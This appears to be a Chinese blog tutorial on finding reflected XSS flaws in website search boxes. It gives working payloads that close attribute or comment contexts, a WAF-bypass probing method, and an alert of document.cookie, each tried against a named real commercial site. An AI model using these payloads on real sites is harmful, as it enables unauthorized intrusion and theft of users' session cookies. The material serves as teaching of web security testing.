1. 查找反射型的xss型的漏洞。
放射性xss漏洞一般存在于搜索框哪里,,原理我就不讲了,直接实战啦
**
1.1 用偏僻字符绕waf
我们在找xss漏洞的时候常常会遇到一些waf防护就比如
例: 100招商网
我们输入最常见的poalay
<script>alert(123)</script>
出现D盾防护。
这时候就出现了 我们应该知道他u盾是防护了什么,什么这时候我们可以 分别输入
<script>,alert(123) ,</a>
对waf的过滤情况进行尝试。
尝试到最后, 我们发现,onclick ,//边框触发 onmouseover //边框触发
,confirm(), prompt() 都可以用,
然后我们可以看看我们要怎么构造语句了 。先输入一端乱码然后点击搜索**
然后在查看原代码
这里我们看到一个输出点为value = “ 我们输入的数据, 所以这时候我们可以尝试用双引号去闭合他们的语句,再构建我们自己的语句。
所以我们利用之前没被被d盾牌过滤的语句构建一个语句。
例;
123456789"%2Bοnclick="confirm(8819)
123456789"%2Bοnclick="prompt(88199)
"οnmοuseοver=prompt(54);" // 边框触发
输入后点击边框,成果弹框
总结:这里面还有其他很多语句麻烦你们看了之后可以自己动手尝试其他语句搜索框。
1.2 用<!----->注释语句闭合前面的注释。
网站 ;http://www.shopin.net/
1.老样子,先输入个
<script>alert(123)</script>
搜索后没什么反应,然后再查看原代码,搜索123 看看我们输入的那个点前面有<–>注释语句,这时候我们想的应该是如何闭合,
所以我们可以构建语句:
<!--> <a href="" onclick="alert(document.cookie)">123456 </a>
进行弹框。
``
成功爆出cookie:
注:document.cookie用于显示用户的信息。
1.3 普通的测试
http://s.linkshop.com.cn/?key=%E7%94%9F%E9%B2%9C%E7%BB%8F%E8%90%A5&type=0
功能点如下:
直接检测:
payload:123456789" οnclick=“alert(0)” 直接弹窗
1.4 普通的测试
目标网站:http://www.dtvipshop.com
反射型XSS漏洞1:
功能点:搜索框
构建 payload:
123456" onclick = "alert(0)
弹框。.
总结;暂时就收集了这么多类型的漏洞,找xss的技巧在于多看源码,多动手。然后希望各位小哥哥小姐姐在看到这篇文章后,觉得能了解到东西的麻烦给小弟一个赞,方便提高我以后写文档的信息,也希望你们在评论区说出我文档的不足。